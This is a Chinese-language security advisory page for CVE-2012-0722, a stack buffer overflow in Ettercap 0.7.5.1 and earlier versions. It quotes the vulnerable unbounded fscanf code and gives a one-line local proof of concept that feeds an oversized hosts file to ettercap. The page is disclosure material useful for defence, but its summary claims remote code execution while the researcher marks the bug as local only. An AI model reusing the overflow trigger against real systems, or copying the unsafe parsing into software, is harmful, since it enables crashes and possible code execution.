安全研究
安全漏洞
Ettercap <= 0.7.5.1栈溢出漏洞
发布日期:2013-01-07
更新日期:2013-01-08
受影响系统:
Ettercap Ettercap 0.7.5.1描述:
Ettercap Ettercap 0.7.5
Ettercap Ettercap 0.7.4.1
BUGTRAQ ID: 57175
CVE(CAN) ID: CVE-2012-0722
Ettercap是一个Linux和BSD系统下的多用途数据包嗅探程序,它也已经被移植到Windows平台下。
Ettercap存在栈缓冲区溢出漏洞,通过发送超长的字符串参数,远程攻击者可利用此漏洞造成缓冲区溢出并在系统上执行任意代码或造成拒绝服务。
<*来源:Sajjad Pourali
链接:http://xforce.iss.net/xforce/xfdb/80989
http://www.exploit-db.com/exploits/23945/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
References: CVE-2012-0722
Discovered by: Sajjad Pourali
Vendor: http://www.ettercap.sourceforge.net/
Vendor contact: 13-01-01 21:20 UTC (No response)
Solution: Using the patch
Patch: http://www.securation.com/files/2013/01/ec.patch
Local: Yes
Remote: No
Impact: low
Affected:
- ettercap 0.7.5.1
- ettercap 0.7.5
- ettercap 0.7.4 and earlier
Not affected:
- ettercap 0.7.4.1
---
Trace vulnerable place:
./include/ec_inet.h:27-44
enum {
NS_IN6ADDRSZ = 16,
NS_INT16SZ = 2,
ETH_ADDR_LEN = 6,
TR_ADDR_LEN = 6,
FDDI_ADDR_LEN = 6,
MEDIA_ADDR_LEN = 6,
IP_ADDR_LEN = 4,
IP6_ADDR_LEN = 16,
MAX_IP_ADDR_LEN = IP6_ADDR_LEN,
ETH_ASCII_ADDR_LEN = sizeof("ff:ff:ff:ff:ff:ff")+1,
IP_ASCII_ADDR_LEN = sizeof("255.255.255.255")+1,
IP6_ASCII_ADDR_LEN = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,
MAX_ASCII_ADDR_LEN = IP6_ASCII_ADDR_LEN,
};
./include/ec_resolv.h:42
#define MAX_HOSTNAME_LEN 64
./src/ec_scan.c:610-614
char ip[MAX_ASCII_ADDR_LEN];
char mac[ETH_ASCII_ADDR_LEN];
char name[MAX_HOSTNAME_LEN];
./src/ec_scan.c:633-635
if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
*ip == '#' || *mac == '#' || *name == '#')
continue;
---
PoC:
sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow
---
+ Sajjad Pourali
+ http://www.securation.com
+ Contact: sajjad[at]securation.com
建议:
厂商补丁:
Ettercap
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://ettercap.sourceforge.net/
浏览次数:3783
严重程度:0(网友投票)
绿盟科技给您安全的保障